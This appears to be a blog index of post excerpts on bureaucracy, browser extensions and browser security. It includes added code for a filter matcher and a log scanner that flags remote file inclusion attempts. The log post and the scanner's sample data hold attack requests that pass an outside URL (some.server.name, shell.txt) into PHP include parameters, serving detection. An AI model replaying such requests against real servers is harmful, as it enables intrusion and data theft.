Posted on by Wladimir Palant

Until recently I thought that the low number of marriages and the relatively high age of people getting married in Germany was solely an expression of a mentality in which everybody relies only on themselves. Now I have learned that there is another factor as well: getting married in Germany is just difficult, despite all the talk about “improving the family-friendliness of the state”. To obtain permission to get married (something I assumed to be a mere formality) you have to jump through all sorts of bureaucratic hoops. After having spent the last three years in Norway I simply didn’t expect this. Of course I should have known better, but you easily get used to the good things.

According to the web page of the registry office you basically only need to bring your passports and fill out a few forms. Well, it also says that there is an additional interview for foreign citizens, but that cannot be too bad, can it? It turned out this interview was only there to tell you which additional certificates are required, something they “absolutely could not tell you on the phone” (despite the official requirements being available on the internet, if you only know what to look for).


Posted on by Wladimir Palant

Disclaimer: This post is only about using NoScript as a security solution, not as a way to block annoyances.

It seems that my pointing out the fundamental flaw in NoScript only inspired another round of madness; that’s the only name I can find for it. Giorgio Maone has developed a solution that will effectively stop untrusted sites from injecting JavaScript through XSS holes in whitelisted sites. He is currently testing it in a development build and, from what I can tell, it mostly delivers what it promises. Is that an achievement? Giorgio has obviously put a lot of thought into this feature, but I still have to say: no.


Posted on by Wladimir Palant

I had to laugh out loud at this one. The IEBlog announces the winners of the IE Add-ons Contest. Guess who won the Grand Prize? Apparently it is a great Internet Explorer add-on called “Inline Search”:

Inline Search provides a way to search for content on a webpage without bringing up the Find Dialog. It incorporates find as you type, highlights search terms and has several other really useful features!


Posted on by Wladimir Palant

I had a lengthy discussion with Giorgio Maone (author of the NoScript extension) about what is a security solution and what isn’t. The starting point was my statement that, while both are excellent for getting rid of annoyances, neither Adblock Plus nor NoScript is really a security solution. Both have the potential, so why not?

Let’s look at the easier case first: Adblock Plus. Adblock Plus is structured as a blacklist: you specify the addresses that you don’t want to load. So if there is a security issue that can be solved by blocking a certain address, you have to add a filter for that address. Requiring an action for each single vulnerability discovered disqualifies Adblock Plus; a real security solution would need to block everything unless explicitly allowed. Right now only the extremely rare case of malware-infested ads would be blocked by default.

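To make the blacklist argument concrete, here is an added example (not code from Adblock Plus and not from the original post): a minimal matcher for Adblock Plus style URL filters, together with a default-allow blocklist and a default-deny allowlist built on it. The filter syntax implemented is that of later Adblock Plus releases (`*`, `^`, `|`, `||`, `@@`), which I assume for the example rather than the 2007 syntax; the filters, host names and URLs are made up. The point it shows is the one above: a blocklist lets a new, unlisted malicious address through until somebody writes a filter for it, while an allowlist blocks it by default.

```javascript
// Added example, not Adblock Plus's own code. Filter syntax assumed here
// (that of later Adblock Plus versions):
//   *    matches any run of characters
//   ^    "separator": any character that is not a letter, digit or one of
//        - . _ %, or the end of the address
//   |    at the start or end of a filter anchors it there
//   ||   at the start anchors at a domain boundary (any scheme, any subdomain)
//   @@   prefix marks an exception filter (explicitly allows the address)
function filterToRegExp(filter) {
  let source = filter;
  let prefix = "";
  let suffix = "";
  if (source.startsWith("||")) {
    source = source.slice(2);
    // scheme, "://", then optionally one or more subdomain labels
    prefix = "^[\\w-]+:/+(?!/)(?:[^/]+\\.)?";
  } else if (source.startsWith("|")) {
    source = source.slice(1);
    prefix = "^";
  }
  if (source.endsWith("|")) {
    source = source.slice(0, -1);
    suffix = "$";
  }
  const body = source
    .replace(/[.+?(){}\[\]\\$|]/g, "\\$&")   // escape regexp metacharacters, keep * and ^
    .replace(/\*+/g, ".*")                    // wildcard
    .replace(/\^/g, "(?:[^\\w\\-.%]|$)");     // separator
  return new RegExp(prefix + body + suffix, "i");
}

// Adblock Plus semantics: nothing is blocked unless a blocking filter
// matches, and an exception filter (@@) overrides any blocking filter.
class Blocklist {
  constructor(filters) {
    this.blocking = [];
    this.exceptions = [];
    for (const f of filters) {
      if (f.startsWith("@@")) this.exceptions.push(filterToRegExp(f.slice(2)));
      else this.blocking.push(filterToRegExp(f));
    }
  }
  shouldBlock(url) {
    if (this.exceptions.some(re => re.test(url))) return false;
    return this.blocking.some(re => re.test(url));   // default: allow
  }
}

// The default-deny alternative the post asks for: a request is loaded
// only if some filter explicitly allows it.
class Allowlist {
  constructor(filters) {
    this.allowed = filters.map(filterToRegExp);
  }
  shouldBlock(url) {
    return !this.allowed.some(re => re.test(url));   // default: block
  }
}

// Constructed sample lists: the ad host is already known, the malware host is not.
const blocklist = new Blocklist(["||ads.example.com^", "/banner.", "@@||example.com/allowed/"]);
const allowlist = new Allowlist(["||example.com^"]);

// Decision of both models for one address.
function decisions(url) {
  return { blocklist: blocklist.shouldBlock(url), allowlist: allowlist.shouldBlock(url) };
}
```

With these lists, `decisions("http://new-malware.test/payload.js")` comes back as `{ blocklist: false, allowlist: true }`: the blocklist has no filter for the new host and loads it, the allowlist refuses it. The `^` separator matters for the allowlist case, since `||example.com^` must not match `http://example.com.evil.test/`.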

Posted on by Wladimir Palant

I read a forum question from an Opera user who was upset because Opera 9.10 now saves web pages “like IE and Firefox”, meaning it saves them together with all the included files. His problem was easily solved with a configuration change, but it got me thinking. Generally this doesn’t seem to be such a bad idea: it allows you to open a saved web page and it will look exactly the same. So I tried to understand why this user was so upset and why I almost never use this feature myself. It seems there are three reasons.


Posted on by Wladimir Palant

I have already left Darmstadt and am on my way back to Oslo now. The unpleasant surprise is that Germanwings no longer flies to Oslo. I have no idea why they stopped serving this route in the middle of the season; I couldn’t find it mentioned anywhere, there are just no more flights between Cologne and Oslo (the web pages of both airports confirm this, so this isn’t a glitch in Germanwings’ database). That means I will fly from Düsseldorf with Norwegian, which is slightly less convenient. But at least I will spend a few more days in Cologne.

I have to finish my PhD within two months, so I guess I will be very busy now. Don’t expect to see much Adblock Plus progress during this time, and I probably won’t look at the forum all that often. As usual, anything urgent is better sent by mail directly to me. I cannot promise a fast reply, but I will look at it.


Posted on by Wladimir Palant

I guess some of you run a web server. Maybe you have noticed entries like this one in your logs:

"GET /forum/admin/admin_styles.php?phpbb_root_path=http://some.server.name/0wn/mail.txt?%5d\r HTTP/1.1" 302 5 "-" "-"

What is this about? In this particular case somebody tried to use a security hole in an older phpBB version to execute PHP code loaded from another server: the script passes the phpbb_root_path variable to include(), so pointing it at a URL makes PHP fetch and run the attacker’s file instead of the local one (a remote file inclusion). I had several hundred entries like this one in the last month, targeting vulnerabilities in all kinds of PHP scripts (most of which are not even installed here). The attackers tried to install backdoors, defacement tools or, in one case, a simple script that sends all e-mail addresses from the local phpBB installation to its owner. The requests usually come from other web servers; I guess those already have the backdoor installed (a botnet).

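If you want to pull such attempts out of your own logs instead of spotting them by eye, here is an added example (not code from the original post): a small scanner for access logs in the Apache/nginx “combined” format that extracts query parameters carrying an absolute URL and scores each hit with the usual signs of a PHP include attack. The log lines, IP addresses and host names below are constructed for the example; the first line reproduces the request shape shown above.

```javascript
// Added example, not code from the original post. Assumes the "combined"
// log format: client ident user [time] "METHOD target PROTO" status size "referer" "agent"
const LOG_LINE = /^(\S+) \S+ \S+ \[([^\]]*)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"/;

function parseLogLine(line) {
  const m = LOG_LINE.exec(line);
  if (!m) return null;
  return { client: m[1], time: m[2], method: m[3], target: m[4],
           status: Number(m[5]), size: m[6], referer: m[7], agent: m[8] };
}

// Query parameters whose value is an absolute URL: the raw material of a
// remote file inclusion (include($path . "file.php") with $path = "http://...").
function rfiParameters(target) {
  const q = target.indexOf("?");
  if (q < 0) return [];
  const hits = [];
  for (const pair of target.slice(q + 1).split("&")) {
    const eq = pair.indexOf("=");
    if (eq < 0) continue;
    const name = pair.slice(0, eq);
    let value = pair.slice(eq + 1);
    try { value = decodeURIComponent(value); } catch (e) { /* keep the raw value */ }
    if (/^(?:https?|ftp):\/\//i.test(value)) hits.push({ name, url: value });
  }
  return hits;
}

// A URL in a parameter is not proof by itself (redirectors and link
// trackers carry URLs legitimately), so each hit is scored with the
// tell-tale signs of an include attack and reported with its reasons.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const entry = parseLogLine(line);
    if (!entry) continue;
    for (const hit of rfiParameters(entry.target)) {
      const reasons = [];
      if (/path|dir|root|inc|file|page|template/i.test(hit.name))
        reasons.push("parameter name looks like an include path");
      if (/\.txt(?:[?#]|$)/i.test(hit.url))
        reasons.push("payload served as .txt so the attacker's own server does not execute it");
      if (hit.url.includes("?"))
        reasons.push("'?' in the URL: whatever the script appends to the path lands in the query string");
      if (hit.url.includes("\u0000"))
        reasons.push("null byte to cut off the appended path");
      findings.push({
        client: entry.client,
        script: entry.target.split("?")[0],
        param: hit.name,
        remote: hit.url,
        status: entry.status,
        confidence: reasons.length ? "high" : "low",
        reasons,
      });
    }
  }
  return findings;
}

// Attempts per source address; the sources are typically other
// compromised web servers, not browsers.
function attemptsByClient(findings) {
  const counts = {};
  for (const f of findings) counts[f.client] = (counts[f.client] || 0) + 1;
  return counts;
}

// Constructed sample log (addresses taken from the documentation ranges).
// The "\\r" is how Apache writes a carriage return the attacker sent.
const SAMPLE_LOG = [
  '203.0.113.7 - - [12/Jan/2007:03:14:07 +0100] "GET /forum/admin/admin_styles.php?phpbb_root_path=http://some.server.name/0wn/mail.txt?%5d\\r HTTP/1.1" 302 5 "-" "-"',
  '203.0.113.7 - - [12/Jan/2007:03:14:09 +0100] "GET /index.php?page=http://198.51.100.23/shell.txt? HTTP/1.0" 404 211 "-" "-"',
  '192.0.2.10 - - [12/Jan/2007:03:15:00 +0100] "GET /blog/?p=42 HTTP/1.1" 200 8123 "http://example.com/" "Mozilla/5.0"',
  '192.0.2.11 - - [12/Jan/2007:03:15:01 +0100] "GET /go?url=https%3A%2F%2Fexample.com%2Fdocs HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
];

function report() {
  const findings = scanLog(SAMPLE_LOG);
  for (const f of findings)
    console.log(`${f.client} -> ${f.script} ${f.param}=${f.remote} [${f.confidence}]`);
  return findings;
}
```

On the sample, the two attack lines come out as high confidence and the redirector line `/go?url=...` as low confidence with no reasons, which is the distinction worth keeping when you feed real logs through it: the response status tells you whether the request hit an installed script at all (a 404 means the attacker guessed wrong), and a high-confidence hit with a 200 is the one to look at first.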

Posted on by Wladimir Palant

I recently linked to an article stating that users of Internet Explorer were exposed to known critical vulnerabilities for 284 days last year. That sounds bad enough, but unfortunately it is not all. For example, I came across a vulnerability in Internet Explorer that has been ranked “Less critical” for reasons I don’t understand. What it does is basically eliminate same-origin checks: any web site can read the contents of another site. I put up an example that checks whether you are logged in on Google or Yahoo and reads out your user name, provided that you use Internet Explorer. It could just as well read your mail or change your mail password. It could also get into your bank account if you happen to be logged in. Information on this vulnerability was published in April last year and it is still unpatched in both Internet Explorer 6.0 and 7.0.


Posted on by Wladimir Palant

I have seen many people complaining that Firefox is no more secure than Internet Explorer. Usually this impression comes up when people read the long lists of security bugs fixed with every maintenance release. Since I have reported a few security bugs myself and could observe how Mozilla deals with them, I knew well that Firefox is still incomparably more secure than Internet Explorer, and now there is proof. Internet Explorer Unsafe for 284 Days in 2006 has the data. Last year users of Internet Explorer were exposed to unpatched critical security flaws for 284 days in total; on 98 of those days the flaws were being actively exploited by web sites. In comparison, there was only one vulnerability in Firefox that was publicly disclosed before a patched Firefox release was available, amounting to 9 days of exposure.

So where did the long lists of security bugs go? Did the author of this article overlook them? No, he didn’t. These bugs were there; they were discovered and fixed, and only then was the information on them disclosed. So while all software has bugs, the major difference here is that Firefox vulnerabilities are reported and fixed before the information is disclosed and somebody gets a chance to abuse them, whereas with Internet Explorer it often happens the other way round.
